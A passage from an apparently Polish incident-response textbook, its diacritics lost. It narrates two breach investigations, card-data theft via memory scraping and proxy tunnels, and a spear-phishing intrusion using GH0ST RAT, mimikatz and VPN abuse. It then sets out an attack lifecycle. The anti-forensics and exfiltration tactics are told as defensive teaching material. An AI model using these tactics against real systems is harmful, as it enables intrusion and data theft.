posiadaczy kart. Jeden z ukradzionych dokumentw przedstawia przepyw danych posiadaczy
kart przez rodowisko, co w sposb niepozostawiajcy wtpliwoci pozwolio zidentyfikowa
szukane systemy.
Posugujc si skradzionymi dokumentami i informacjami zgromadzonymi podczas
rekonesansu, haker odkry sposb nazywania systemw przetwarzajcych lub przechowujcych
dane posiadaczy kart PROC_FIN01, PROC_FIN02, STOR_FIN01, STOR_FIN02 itd.
To umoliwio mu przeprowadzenie dalszych czynnoci rozpoznawczych i wykrycie
dziewidziesiciu systemw przetwarzajcych lub przechowujcych dane posiadaczy kart.
Ponadto haker dowiedzia si, e rodowisko byo tak skonfigurowane, aby aden system nie mia
bezporedniego dostpu do internetu. Aby wic wykra dane z wszystkich dziewidziesiciu
systemw w pautomatyczny sposb, haker potrzebowa zdalnego dostpu do rodowiska
finansowego i musia wydoby z niego dane.
Wamywacz zainstalowa program BKDOOR w piciu chyba losowo wybranych systemach
w rodowisku finansowym i kad instancj skonfigurowa tak, aby komunikowaa si z programem
PROXY nasuchujcym na porcie TCP 88, na serwerze JMPSRV. Na JMPSRV haker zainstalowa
PROXY i skonfigurowa go tak, aby przekazywa poczenia przychodzce z portu TCP 88, czsto
uywanego sieciowego portu proxy, do innej instancji PROXY dziaajcej w gwnej usudze
wymiany poczty MAIL. Haker przekazywa ruch z JMPSRV do MAIL, poniewa program
MAIL mia bezporednie poczenie z internetem, a JMPSRV nie. Instancja programu PROXY
zaszczepiona w MAIL przekazywaa poczenie przychodzce na porcie TCP 88 do kontrolowanego
serwera przez port TCP 80, ktry jest standardowo wykorzystywany (i nieszyfrowany) do obsugi
ruchu HTTP. W tym przypadku przekazywane poczenie dziaao dwukierunkowo (tzn. serwer
C2 -> JMPSRV i JMPSRV -> serwer C2). Na kolejnym rysunku przedstawiamy ciek sieciow
oprogramowania zainstalowanego i skonfigurowanego przez hakera w celu zapewnienia zdalnego
dostpu do i z chronionego rodowiska finansowego.
Tydzie po utworzeniu infrastruktury tylnych drzwi w rodowisku finansowym haker

rozpocz testowanie metod kradziey danych posiadaczy kart. Przesa do PROC_FIN01 narzdzia
Sysinternals PsSuite oraz wasny plik binarny zapisujcy zawarto pamici dziaajcego procesu
w wyznaczonym pliku. Najpierw haker wykona polecenie pslist, aby wykry dziaajce procesy,
a potem uruchomi wasny plik binarny, aby wykona zrzut zawartoci pamici wielu procesw.
Nastpnie z otrzymanych danych utworzy wieloczciowe archiwum RAR i przesa je poza
rodowisko. Prbowa dowiedzie si, ktry proces zawiera dane posiadaczy kart.
Cho wydaje si to nieprawdopodobne, niezaszyfrowane dane posiadaczy kart czsto mona
znale w rnych systemach w chronionych rodowiskach finansowych czsto zwanych
rodowiskami PCI, poniewa musz one by zgodne ze standardami PCI Data Security. Niektre
terminale POS i oprogramowanie tych terminali przez uamek sekundy przetwarzaj dane
posiadaczy kart w postaci tekstowej w pamici dziaajcego procesu, zanim je zaszyfruj.
Aktualnie czsto stosowanym rozwizaniem jest szyfrowanie typu end-to-end (E2EE). Metoda ta
polega na szyfrowaniu danych bezporednio w czytniku kart i ich rozszyfrowywaniu dopiero
wtedy, gdy dotr w miejsce docelowe.
Dwa dni po zdobyciu zawartoci pamici wielu procesw haker ponownie wszed do
PROC_FIN01. Tym razem przesa inny, wasny plik binarny o nazwie cardharvest.exe. Plik ten
musia by uruchamiany rcznie i wstrzykiwa sam siebie do procesu wskazanego za pomoc
wiersza polece lub w pliku konfiguracyjnym. Po wstrzykniciu si do dziaajcego procesu wirus
co 15 sekund szuka w pamici procesu danych ze cieki 2. za pomoc wyraenia regularnego.
Ponadto tworzy skrt kadego egzemplarza danych, aby zapobiec gromadzeniu duplikatw danych.
Pniej program szyfrowa znalezione informacje przy uyciu algorytmu RC4 i zakodowanego
na stae statycznego klucza oraz zapisywa dane w pliku lokalnym.
W ramach testu haker wczy program cardharvest.exe w PROC_FIN01 na okoo 15 minut,
a nastpnie zrobi to samo w innych piciu systemach. Po uruchomieniu wirus szuka pliku
c:\windows\system32\temp\stopme.txt. Jeli go znalaz, koczy dziaanie, co zapobiegao uruchomieniu
wielu kopii tego samego programu w jednym systemie. Pniej haker wykonywa skrypt z JMPSRV,
ktry montowa udzia sieciowy do kadego z szeciu systemw testowych, przenosi pliki zdobyte
przez wirus do katalogu lokalnego i kompresowa ten katalog do postaci archiwum RAR
zabezpieczonego hasem. Potem pobiera to archiwum za pomoc programu BKDOOR.
Przez kolejne trzy miesice haker zdoby miliony egzemplarzy danych posiadaczy kont z wszystkich
dziewidziesiciu systemw finansowych. Wchodzi do rodowiska co tydzie lub dwa przy
uyciu tunelowania ruchu RDP przez ustanowione poczenie C2 midzy JMPSRV i serwerem C2,
nastpnie wykonywa rne skrypty do pracy w zdobytym systemie finansowym. Skrypty te
zatrzymyway program cardharvest.exe we wszystkich systemach, kopioway pliki z wynikami do
JMPSRV i tworzyy zaszyfrowany plik RAR zawierajcy zgromadzone pliki wyjciowe. Na koniec
haker wykonywa polecenie pobrania plikw w programie BKDOOR, aby pobra archiwum RAR.
Mniej wicej po dziesiciu miesicach, od momentu w ktrym doszo do wamania do sieci,
jeden z administratorw systemu zauway, e serwer o nazwie MAIL komunikuje si przez port
TCP 80 z adresem IP pochodzcym z obcego kraju. Po wykonaniu kilku czynnoci wstpnych
stwierdzi, e doszo do wamania, i wszcz postpowania zaradcze. Polegao ono na tym,
e wezwano czterech z nas do siedziby firmy w celu opracowania planu ograniczenia szkd,
przeprowadzenia kompleksowego ledztwa oraz eradykacji wszystkich ladw dziaalnoci hakera
ze rodowiska. Cay proces reakcji na incydent trwa w sumie mniej ni dwa miesice.
Byo to zadanie trudne z wielu powodw. Nasz zesp musia:
znale wskaniki naruszenia bezpieczestwa we wszystkich systemach w rodowisku;
prowadzi analizy w systemach Windows, Linux oraz Apple OS X;
przeanalizowa ruch sieciowy ponad dziesiciu internetowych punktw dostpowych;
przeanalizowa zoliwe oprogramowanie systemw Windows (PE) i Linux (ELF);
rozgry skomplikowane systemy finansowe i zoone rodowisko, aby dobrze zrozumie
istot incydentu.
Zesp naprawczy mia za zadanie:
natychmiastowo wdroy plan ograniczania szkd dla chronionego rodowiska
finansowego;
wsppracowa z zespoem ledczym w celu opracowania kompleksowego rozwizania;
przeprowadzi eradykacj wirusw z caej organizacji w cigu dwch dni;
unika wywierania wpywu na dziaanie systemw finansowych przez pewien czas.
Najwiksz trudnoci w tym ledztwie byo to, e musielimy caociowo spojrze na

rodowisko i dokadnie okreli zakres wamania, aby dowiedzie si, jaka bya metoda dziaania
hakera. Ponadto zesp naprawczy musia opracowa rygorystyczny plan powstrzymania ekspansji
bez posiadania penej wiedzy o rodowisku i o hakerze, co zawsze jest bardzo trudne. Zoono
systemw finansowych i rodowiska zmuszay naszych specjalistw do cisej wsppracy
z pracownikami IT, ktrzy dobrze znali rodowisko, gromadzili dla nas informacje oraz pomagali
nam interpretowa niektre dane.
Studium przypadku 2. Certyfikat autentycznoci

W tym przypadku haker zastosowa atak typu spear phishing. W poowie maja wysa faszyw
wiadomo e-mail zawierajc spreparowany dokument PDF do stu uytkownikw w czterech
rnych jednostkach biznesowych firmy z brany technologicznej. aden z nich nie mia uprawnie
administratora domeny, ale wikszo miaa uprawnienia administratora lokalnego w swoich systemach.
W toku ledztwa ustalono, e wszystkie te osoby nawizay relacje biznesowe z prelegentami
pewnej konferencji branowej. Najwyraniej haker zbada kad jednostk, dla ktrej pracowali
prelegenci, i wysa spreparowan wiadomo e-mail do wszystkich powizanych adresw, ktre
udao si znale w internecie.
Jeden z adresatw o imieniu Bob nieopatrznie otworzy podsunity mu plik PDF w wersji
programu Adobe Acrobat, ktra nie bya zabezpieczona przed zawartym w pliku eksploitem.
ledztwo wykazao, e system Boba jako jedyny pad ofiar phishingu. Eksploit zaszczepi konia
trojaskiego o dostpie zdalnym (ang. remote access trojan RAT), powszechnie zwanego
GH0ST RAT, i otworzy poprawny plik PDF, dziki czemu Bob nie nabra adnych podejrze.
GH0ST zacz kontaktowa si ze swoim serwerem C2, powiadamiajc hakera, e udao si
wama do systemu BOBSYS01.
Haker poczy si z instancj GH0ST RAT w systemie BOBSYS01 po dwch dniach.
Natychmiast zorientowa si, e instancja ta dziaa z uprawnieniami lokalnego administratora,
wic rozpocz rekonesans w systemie. Zacz od przejrzenia lokalnych dokumentw uytkownika.
Na podstawie ich zawartoci stwierdzi, e Bob jest inynierem. Ponadto przeszuka typowe cieki
znanych programw VPN i przechowywania informacji o certyfikatach oraz dowiedzia si,
e Bob pracuje w domu i czy si ze rodowiskiem korporacyjnym przez VPN. Opisywana firma
wykorzystywaa sabsz wersj uwierzytelniania dwuskadnikowego polegajcego na tym, e wymagany
by certyfikat maszyny oraz nazwa uytkownika i haso.
Haker zdoby skrt hasa do lokalnego konta administratora i zama je. Nastpnie uruchomi
narzdzie mimikatz.exe w celu zdobycia hasa Boba i certyfikatu maszyny VPN. Hakerowi udao si
zdoby nastpujce informacje:
nazw uytkownika Boba;
haso Boba;
certyfikat maszyny Boba;
haso administratora lokalnego (jest takie same dla wikszoci systemw w rodowisku).
Od tej pory haker mg uwierzytelnia si w sieci VPN firmy, podszywajc si pod uprawnionego
uytkownika, oraz mia dostp do prawie kadego systemu w rodowisku, bo wykorzystywa konto
lokalnego administratora. Zatem od tej pory hakera nie interesowa ju system Boba ani znajdujcy
si w nim wirus. Nie usun go jednak, prawdopodobnie jako zabezpieczenie na wypadek utraty
dostpu do sieci VPN.
Niecay tydzie pniej haker poczy si z sieci VPN z systemu o nazwie HOME3. Nazwa
systemu hakera zostaa wykryta podczas ledztwa prowadzonego w systemie, do ktrego nastpio
wamanie. Haker zakoczy sesj RDP, zamykajc okno, a nie wylogowujc si. To spowodowao
zarejestrowanie w dzienniku zabezpiecze systemu ofiary zdarzenia wraz z nazw hosta i adresem
IP hakera przypisanym z puli VPN. Analiza dziennikw VPN pozwolia znale adres IP, z jakiego
nawizano poczenie. Nastpnie za pomoc ekspertyzy geolokacyjnej ustalono, e adres IP naley
do sieci komputerowej z Teksasu. To jednak nie musi oznacza, e haker rzeczywicie znajduje si
w tym regionie. Hakerzy czsto wamuj si do niepowizanych systemw spoza organizacji ofiary
i wykorzystuj je jako tymczasowe lokalizacje do przeprowadzania atakw.
Przez dwa nastpne tygodnie haker prowadzi rozeznanie w rodowisku, m.in. mapowa
udziay sieciowe, rekurencyjnie tworzy listy katalogw, zainstalowa rejestrator naciskanych
klawiszy w krytycznych systemach oraz przy uyciu skradzionych danych powiadczajcych
uytkownikw czy si zdalnie z ich poczt przez firmow implementacj usugi sieciowej
Outlook Web Access (OWA). Nie ma adnych ladw przemawiajcych za tym, e w okresie tym
haker skrad jakiekolwiek poufne informacje.
Mniej wicej dwa tygodnie pniej haker zacz pobiera wane dane dotyczce dziaalnoci
firmy z udziau na serwerze plikw SENS1. Udzia ten zawiera poufne dane inynieryjne dotyczce
nowej technologii, nad ktr pracowaa firma. Wyciek tych informacji oznaczaby utrat rynkowej
przewagi firmy nad konkurencj. Dostp do plikw tylko dla inynierw pracujcych w projekcie
by chroniony za pomoc list ACL, ale haker mia dostp do lokalnego konta administratora, wic
dopisa do tych list take siebie. Przypomnijmy, e haso lokalnego konta administratora byo takie
same w wikszoci systemw w rodowisku. Przez cztery nastpne tygodnie haker sporadycznie
wykrada dane z tajnego udziau. Tworzy zaszyfrowane archiwa RAR zawierajce interesujce go
pliki, zmienia nazwy RAR na CAB, a nastpnie wysya dane do kontrolowanego przez siebie
serwera poprzez FTP. Po wykradzeniu danych haker usuwa plik RAR i wcza defragmentator
dysku Windows, aby uniemoliwi ledczym ewentualne odzyskanie danych.
Mniej wicej dwa tygodnie po tym, jak haker rozpocz wykradanie wanych informacji
dotyczcych dziaalnoci firmy z serwera SENS1, firma zacza ewaluacj nowego systemu
zarzdzania informacjami oraz zdarzeniami bezpieczestwa informatycznego (ang. Security
Information and Event Management SIEM) i przekazaa dzienniki VPN jako jeden ze zbiorw
danych do przeanalizowania przez ten system. Analiza wykazaa, e Bob wielokrotnie logowa si
do sieci VPN z wicej ni jednego systemu i z wicej ni jednego adresu IP jednoczenie. Firmowi
specjalici od zabezpiecze przeanalizowali ruch VPN i natychmiast wyczyli konto Boba.
Wwczas haker zacz korzysta z konta uytkownika o nazwie Mary, ktre rwnie zdoby.
Prawdopodobnie wama si do wikszej liczby kont i zdoby wicej certyfikatw, aby zapewni
sobie cigy dostp do rodowiska.
Tego samego dnia system SIEM wykry te niepokojc dziaalno na koncie Mary. To skonio
kierownictwo firmy do podjcia rodkw zaradczych i skontaktowania si z nami w celu uzyskania
pomocy. Okazao si, e w firmie nie zdawano sobie sprawy z rozlegoci zagroenia. Przed wdroeniem
czynnoci naprawczych warto byo najpierw szczegowo zbada spraw. W toku ledztwa odkrylimy,
e jeden z adresw IP wykorzystywanych przez hakera do czenia si z sieci VPN by taki sam,
jak adres IP, na ktry sygna wysya program GH0ST RAT. To umoliwio nam zidentyfikowanie
GH0ST RAT i wczenie BOBSYS01 do dziaa naprawczych. Pomoglimy firmie przeprowadzi
kompleksow eradykacj i usun hakera ze rodowiska w dwa tygodnie po wszczciu akcji.
Dwa dni po eradykacji system SIEM wykry, e adres IP uywany wczeniej przez hakera
prbuje poczy si z instancj OWA przy uyciu wielu kont uytkownikw. Cho w ramach
eradykacji zmieniono hasa do wszystkich kont uytkownikw, specjalici od zabezpiecze
zorientowali si, e nie wszyscy uytkownicy to zrobili. Zatem jeszcze raz przeprowadzono masow
zmian wszystkich hase oraz wyczono te konta, ktre nie zmieniy hasa w cigu dwudziestu
czterech godzin. W ten sposb uniemoliwiono hakerowi dostp do OWA. Na szczcie dla firmy
hakerowi udao si jedynie odczyta wiadomoci e-mail z piciu rnych kont uytkownikw,
wszyscy byli inynierami. Potem znw straci dostp do systemu. Opisane dziaania przedstawiamy
na poniszym rysunku.
Sprawa ta bya bardzo interesujca z tego powodu, e haker zaszczepi tylko jedne tylne drzwi
GH0ST, ktrych uy na pocztku do zainfekowania systemu. Pniej haker uzyskiwa i utrzymywa
dostp do rodowiska, korzystajc z sieci VPN. To utrudnio nam dochodzenie, poniewa wszelkie
bezprawne dziaania, z wyjtkiem wykonywanych w systemie BOBSYS01, byy prowadzone przez VPN.
Zesp dochodzeniowy musia sprawdza pozornie normalne zdarzenia, ktre byy wykonywane
w zych zamiarach. Aby np. dowie, e haker rekurencyjnie sporzdzi list katalogw na okrelonym
serwerze plikw, nasi specjalici musieli zrobi jedn z poniszych rzeczy:
odzyska polecenia wykonane przez hakera,
odzyska plik, w ktrym haker zapisa dane,
znale du liczb plikw, do ktrych kto uzyskiwa dostp sekwencyjny w czasie
trwania infekcji (w analizowanym okresie).
Inn rnic midzy tym a poprzednim przypadkiem jest to, e w pierwszym przypadku zesp
dochodzeniowy szuka dowodw wamania w caym rodowisku, a w drugim tylko w okrelonym
podzbiorze systemw (na podstawie poszlak). Oprcz znalezienia wszystkich celw pocztkowego
ataku typu spear phising, specjalici ledczy podpierali si dowodami zdobywanymi za pomoc
analizy aktywnoci w sieci VPN i na podstawie tak uzyskanych informacji okrelali, ktre systemy
trzeba przeanalizowa. Zesp ledczy nie musia szuka dowodw wamania we wszystkich
systemach w caym rodowisku. Byo tak, poniewa haker mia dostp do rodowiska przez
ograniczony czas i za kadym razem wchodzi do niego w taki sam sposb, co uatwiao ledztwo.
Natomiast w pierwszym przypadku specjalici ledczy, aby okreli zakres ekspansji szkd, musieli
szuka wskanikw wamania we wszystkich systemach w rodowisku, gdy haker mia duo czasu
na dziaanie, zdy wiele zrobi, a samo rodowisko naleao zabezpieczy przed dalszymi
nielegalnymi dziaaniami.
Najwiksz rnic midzy rozwizaniami zastosowanymi w tym i poprzednim przypadku jest
to, e ta firma zastosowaa kilka natychmiastowych rozwiza, kade w odpowiedzi na okrelone
dziaania hakera. Gdyby wamywacz wszczepi inne tylne drzwi ni GH0ST lub gdyby przeoczono
inn ciek dostpu do rodowiska, wszystkie te rodki zaradcze nie powstrzymayby hakera przed
dalszym penetrowaniem rodowiska.
Na zakoczenie tego rozdziau pragniemy przedstawi pojcie, ktrego uywamy do wyjaniania
rnych faz ataku, czyli cykl ataku. Posugujemy si nim przy demonstrowaniu rnych etapw
wikszoci wama oraz przy planowaniu czynnoci zaradczych. Pomylelimy, e najlepiej
bdzie zdefiniowa to pojcie ju w tym rozdziale, poniewa moemy posuy si przykadami
z przedstawionych studiw przypadku.
FAZY CYKLU ATAKU

Typowy cykl ataku skada si z siedmiu faz. Nie wszystkie dadz si wyrni w kadym ataku,
ale mona dostosowa ten szablon do konkretnej sytuacji. Ponadto fazy ataku nie zawsze
wystpuj w takiej kolejnoci, w jakiej je tu omawiamy. Opisujemy to pojcie w tym rozdziale,
poniewa incydenty naley rozpatrywa w kontekcie rnych faz ataku. Posugiwanie si
zdefiniowanymi fazami pomaga lepiej zrozumie kontekst wykrytej aktywnoci w odniesieniu
do caego zdarzenia. Ponadto fazy ataku naley uwzgldnia podczas planowania czynnoci
zaradczych. Na poniszym rysunku przedstawiamy cykl faz ataku.
Poniej opisujemy siedem faz cyklu ataku oraz wskazujemy, jak kady etap odnosi si
do przypadkw, ktre przestudiowalimy wczeniej.
Pocztkowe stadium wamania haker wykonuje zoliwy kod w przynajmniej jednym
systemie. Najczciej jest to moliwe z wykorzystaniem inynierii spoecznej, np. przy
uyciu techniki spear phishing, lub za pomoc luki w systemie podczonym do internetu.
W atakach bazujcych na inynierii spoecznej czsto wykorzystuje si podatn na ataki
obc aplikacj dziaajc w systemie docelowego uytkownika.
Przypadek 1. Haker zastosowa technik SQL injection na podatnym serwerze
baz danych.
Przypadek 2. Haker wysa zainfekowany dokument PDF poczt e-mail.
Ustanowienie punktu wejcia haker zapewnia sobie dostp do zaatakowanego systemu.
Robi to natychmiast po pocztkowym stadium wamania. Najczciej w tym celu
w zainfekowanym systemie instalowane s trwae tylne drzwi albo wysya si do tego
systemu dodatkowe pliki binarne lub kod powoki.
Przypadek 1. Haker zainstalowa tylne drzwi w systemie w rodowisku wewntrznym.
Przypadek 2. Zainfekowany plik PDF zainstalowa wirus GH0ST RAT w systemie
BOBSYS01.
Zwikszenie uprawnie haker uzyskuje dostp do systemw i danych szerszy ni
pocztkowo. W celu zwikszenia uprawnie najczciej wykonuje si zrzut skrtw hase
lub tokenw, po czym amie si hasa lub wykonuje atak polegajcy na przesaniu skrtu,
rejestruje si naciskane klawisze w celu przechwycenia danych powiadczajcych, wykorzystuje
si uytkownikw bez uprawnie, wydobywa si z pamici haso zalogowanego uytkownika
albo wykorzystuje si uprawnienia posiadane przez aplikacj, np. mona wykonywa
polecenia przy uyciu procedury rozszerzonej xp_cmdshell dostpnej w Microsoft SQL.
Dodatkowo w fazie tej haker uzyskuje dostp do kont uytkownikw, ktrzy niekoniecznie
s administratorami, ale maj dostp do podanych plikw lub innych zasobw.
Przypadek 1. Haker wykona zrzut hase i zama hasa administratorw domeny.

Przypadek 2. Haker od pocztku zdoby wysokie uprawnienia (konto Boba), ale zama
haso administratora lokalnego, aby mie wysokie uprawnienia dostpu do innych systemw.
Ponadto haker poszerzy zakres swojej dziaalnoci poprzez wamanie si do wikszej
liczby kont, za pomoc ktrych mg zdalnie czy si ze rodowiskiem poprzez sie VPN.
Rekonesans wewntrzny haker bada rodowisko ofiary w celu zdobycia wiedzy o jego
strukturze, rolach i obowizkach kluczowych postaci oraz ustalenia, gdzie s przechowywane
najwaniejsze informacje.
Przypadki 1. i 2. W obu przypadkach hakerzy badali lokalne katalogi uytkownikw,
w ktrych najczciej przechowuje si dokumenty. Rekurencyjnie wykonali listy plikw,
aby znale te niestandardowe miejsca przechowywania poufnych danych. Ponadto
hakerzy wykonali enumeracj udziaw sieciowych za pomoc narzdzi wiersza polece
oraz zbadali sie i usugi.
Uwaga W opisach wama zwykle bagatelizuje si rol rekonesansu wewntrznego przeprowadzanego

przez hakera. Cyberprzestpcy czsto dokadnie badaj system, do ktrego si wamali, aby dobrze
pozna rodowisko, w jakim si poruszaj.
Szperanie w systemie haker wykorzystuje zdobyte dojcie do rodowiska w celu poruszania

si po tworzcych je systemach. Najczciej w ramach tych akcji haker bada udziay sieciowe,
wykonuje programy za pomoc usug harmonogramu zada systemu Windows, posuguje
si narzdziami do dostpu zdalnego, takimi jak PsExec i radmin, korzysta z klientw
pulpitu zdalnego, np. RDP i Dameware, oraz zdobywa dostp do graficznego interfejsu
uytkownika systemu za pomoc technologii VNC (ang. virtual network computing).
Przypadek 1. Haker wykorzysta poczenia RDP, mapowanie udziaw sieciowych
oraz posugiwa si tylnymi drzwiami.
Przypadek 2. Haker wykorzysta poczenia RDP oraz mapowanie udziaw sieciowych.
Zapewnienie nieprzerwanego dostpu haker zapewnia sobie dostp do rodowiska
ofiary. Typowe metody podtrzymywania obecnoci w systemie polegaj na zainstalowaniu
wielu niepowizanych ze sob tylnych drzwi (zarwno odwrotnych, jak i standardowych,
takich jak wiersze polece dostpne przez internet, tzw. webshells, w systemach podczonych
do internetu), zdobyciu dostpu do sieci VPN oraz zaimplementowaniu kodu tylnych drzwi
w legalnych aplikacjach.
Przypadek 1. Haker zaszczepi wiele wariantw dwch rodzin tylnych drzwi. Kada
z rodzin dziaaa inaczej ni druga, wic nawet znalezienie wszystkich wariantw jednej
nie oznaczao automatycznie wykrycia drugiej.
Przypadek 2. Haker wama si na konta wielu uytkownikw i skrad certyfikaty ich
maszyn. To pozwolio mu na uwierzytelnianie si w sieci VPN przy uyciu wielu kont
uytkownikw; jeli zatem wamanie na jedno konto zostao odkryte, uytkownik
zmieni haso lub z jakiego innego powodu stao si ono bezuyteczne, do dyspozycji
mia jeszcze inne konta.
Zakoczenie misji hakerzy osigaj swj cel, ktrym czsto jest kradzie lub modyfikacja
istniejcych danych. Gdy zrobi to, co chcieli, rzadko opuszczaj zdobyte rodowisko, tylko
pozostaj w nim na wypadek, gdyby mieli now misj do wykonania. Nierzadko si zdarza,
e haker niektre fazy cyklu ataku powtarza wielokrotnie w czasie jednego incydentu.
Przykadowo zodziej danych kart kredytowych i debetowych moe nie tylko ukra
informacje, ale i zmieni dane w krtkim czasie.
Studium przypadku 1. haker wykrad dane kart kredytowych.
Studium przypadku 2. haker wykrad dane o tajnym projekcie.
I CO Z TEGO
Cyberataki bd si zdarzay. Stay si ju norm. Jeli jest ryzyko wamania, wczeniej czy pniej
pewnie padniesz jego ofiar. Dlatego naley wiedzie, co robi i jak skutecznie zareagowa na incydent.
Czas powicony na nauk technik i procedur opisanych w tej ksice na pewno nie bdzie czasem
straconym.
Skoro ju wzbudzilimy Twoj ciekawo i jeste gotw do dalszej lektury tej ksiki,
chcielibymy, aby zacz myle jak czonek zespou reagowania na incydenty. Czy uwaasz, e
opisane organizacje optymalnie rozwizay swoje problemy? Co Twoim zdaniem powinny
zrobi przed wamaniem, aby ograniczy jego skutki? Warto zastanowi si nad tymi pytaniami,
poniewa jednym z zada specjalisty zajmujcego si reagowaniem na incydenty jest wanie
szukanie odpowiedzi na takie pytania i wiele innych. Musisz dziaa tak, aby zatrudniajca Ci
organizacja miaa pewno, e rozwiesz problem. Robilimy to ju setki razy, a i tak cigle
uczymy si czego nowego. A gdy przypominamy sobie wczeniejsze operacje, zawsze znajdujemy
co, co teraz moglibymy zrobi lepiej. Mdry Polak po szkodzie!
PYTANIA
1. Co to jest incydent bezpieczestwa?
2. Kto powinien zdefiniowa incydent bezpieczestwa?
3. Czy wszystkie wirusy s dostosowane do konkretnego systemu operacyjnego?
4. Jakie nieprawidowoci w architekturze sieciowej firmy opisanej w studium przypadku 1.
dostrzegasz?
5. Z ilu faz skada si cykl ataku?
6. Czy kady atak zawsze skada si z wszystkich typowych faz?
ROZDZIA 2.
Podrcznik reagowania
na incydenty
bezpieczestwa
P
rzygotowanie si na incydent bezpieczestwa komputerowego i odpowiednia reakcja to due
wyzwanie. Technologia nie stoi w miejscu, przez co czasami moe si wydawa, e trudno
za ni nady. Jednak wsplnie mamy ju ponad trzydzieci lat dowiadczenia w tej brany
i pracowalimy nad setkami przypadkw w organizacjach kadej wielkoci. W odniesieniu do tego
rozdziau do gowy przychodz dwie konkretne myli. Po pierwsze, najwiksze trudnoci przy reagowaniu
na incydenty powoduj sprawy nietechniczne. Po drugie, podstawowe zasady badania incydentw
bezpieczestwa komputerowego nie rni si od nietechnicznych ledztw. Najwiksz trudnoci
jest przedarcie si przez szum marketingowy, ktrego celem jest przekonanie nas, e jest inaczej.
W rozdziale tym pragniemy pomc Ci w przejciu przez gszcz modnych sw i marketingowy
szum, aby wiedzia, co naprawd jest wane, i mg sporzdzi solidny program reagowania na
incydenty bezpieczestwa. Zaczynamy od podstaw, czyli wyjaniamy, co oznacza bezpieczestwo
komputerowe, jakie s cele reakcji na incydent oraz kto bierze udzia w tym procesie. Nastpnie
opisujemy fazy cyklu ledztwa, metody zdobywania najwaniejszych informacji oraz techniki
raportowania. Z dowiadczenia wiemy, e organizacje, ktre powicaj duo czasu na przemylenie
tych kwestii, znacznie skuteczniej radz sobie z incydentami bezpieczestwa.
CO TO JEST INCYDENT
BEZPIECZESTWA KOMPUTEROWEGO
Definicja incydentu bezpieczestwa komputerowego okrela zakres dziaa utworzonego zespou
specjalistw i pozwala skupi dziaania na odpowiednich obszarach. Definicja jest bardzo wana,
poniewa dziki niej kady czonek druyny zna swoje obowizki. Jeli jeszcze jej nie sformuowae,
powiniene jak najszybciej okreli, co w Twojej organizacji oznacza pojcie incydent bezpieczestwa
komputerowego. Nie istnieje jedyna powszechnie przyjta definicja, ale uwaa si, e incydent
bezpieczestwa komputerowego to kade zdarzenie:
ktrego celem jest spowodowanie szkody,
ktrego sprawc jest czowiek,
w ktrym wykorzystywane s zasoby komputerowe.
Przyjrzymy si krtko tym cechom. Pierwsze dwie s zbiene z wieloma typami incydentw
nietechnicznych, np. podpaleniem, kradzie czy napaci. Jeli celem nie jest wyrzdzenie
krzywdy, trudno zdarzenie nazwa incydentem. Naley przy tym podkreli, e szkoda moe nie
by natychmiastowa. Przykadowo skanowanie systemu w poszukiwaniu luk w zabezpieczeniach,
ktre pniej zostan wykorzystane w szkodliwy sposb, samo w sobie nie powoduje szkody ale
bez wtpienia jest to dziaanie, ktrego celem jest wyrzdzenie krzywdy. Druga cecha, czyli udzia
czowieka, wyklucza takie zdarzenia jak losowe awarie systemu i czynniki niezalene od nas, np.
pogod. To, e z powodu przerwy w dopywie energii przestaa dziaa zapora sieciowa, wcale
nie oznacza, e wystpi incydent bezpieczestwa, chyba e sprawc tej przerwy jest dziaajcy
umylnie czowiek albo kto wykorzysta nadarzajc si okazj do zrobienia czego niedozwolonego.
ROZDZIA 2. PODRCZNIK REAGOWANIA NA INCYDENTY BEZPIECZESTWA 47
Trzecia cecha decyduje o tym, e dane zdarzenie to wanie incydent bezpieczestwa

komputerowego, poniewa dotyczy zasobw komputerowych. Pojcia zasoby komputerowe
uywamy, poniewa obejmuje szeroki wachlarz rnych technologii. Czasami zasoby komputerowe
pozostaj niezauwaone s to noniki do archiwizacji danych, telefony, drukarki, karty dostpu
do budynkw, tokeny dwuskadnikowe, kamery, automaty, urzdzenia GPS, tablety, telewizory
i wiele innych. Urzdzenia komputerowe s wszdzie i czasami zapominamy, jak duo informacji
si w nich znajduje, czym steruj oraz do czego s podczone.
Czasami moemy nie mie pewnoci, czy dane zdarzenie jest incydentem, dopki nie przeprowadzimy
pewnych analiz wstpnych. Podejrzan aktywno zawsze naley traktowa jako potencjalny incydent,
ktry trzeba zbada i ewentualnie udowodni, e nim nie jest. Moe te si zdarzy, e w toku ledztwa
prowadzonego w sprawie incydentu okae si, e to wcale nie by incydent bezpieczestwa.
Oto kilka przykadw typowych incydentw bezpieczestwa komputerowego:
kradzie danych, takich jak poufne informacje osobiste, wiadomoci e-mail i dokumenty;
kradzie funduszy, np. nieuprawniony dostp do konta bankowego, skorzystanie z karty
kredytowej lub oszustwo dotyczce przeleww;
wyudzenie;
nieuprawniony dostp do zasobw komputerowych;
obecno szkodliwego oprogramowania, np. narzdzi zdalnego dostpu i programw szpiegujcych;
posiadanie nielegalnych lub nieautoryzowanych materiaw.
Skutkiem tych incydentw moe by konieczno przeinstalowania kilku komputerw, poniesienie
duych kosztw zwizanych z czynnociami naprawczymi, a nawet zamknicie caej organizacji.
Decyzje, ktre podejmiesz, zarwno przed incydentem, podczas jego trwania, jak i po incydencie,
bd miay bezporedni wpyw na to, co si wydarzy.
CELE REAKCJI NA INCYDENT

Gwnym celem reagowania na incydent bezpieczestwa jest pozbycie si zagroenia ze rodowiska
komputerowego organizacji, zminimalizowanie szkd oraz przywrcenie normalnej dziaalnoci.
Cel ten osiga si, wykonujc dwie wane czynnoci. Oto one.
ledztwo
Ustalenie pocztkowej metody przeprowadzenia ataku.
Ustalenie uytych szkodliwych programw i narzdzi.
Ustalenie, ktre systemy zostay zainfekowane i w jaki sposb si to stao.
Ustalenie, czego hakerowi udao si dokona (szacowanie szkd).
Ustalenie, czy incydent trwa.
Ustalenie czasu trwania incydentu.
Czynnoci naprawcze
Wykorzystanie informacji zdobytych w toku ledztwa oraz opracowanie i wdroenie
planu naprawczego.
KTO BIERZE UDZIA

W PROCESIE REAKCJI NA INCYDENT
Reakcja na incydent (ang. incident response IR) to dyscyplina obejmujca wiele dziedzin.
Wymaga znajomoci zasobw z kilku rnych jednostek operacyjnych organizacji. Jak wynika
z rysunku 2.1, w proces reagowania na incydent bezpieczestwa moe zosta zaangaowanych
wiele osb z rnych dziaw firmy, np. specjalici od zasobw ludzkich, prawnicy, informatycy,
specjalici od PR, specjalici od zabezpiecze, ochroniarze, dyrektorzy, pracownicy pomocy
technicznej i inni.
RYSUNEK 2.1. Skad zespou
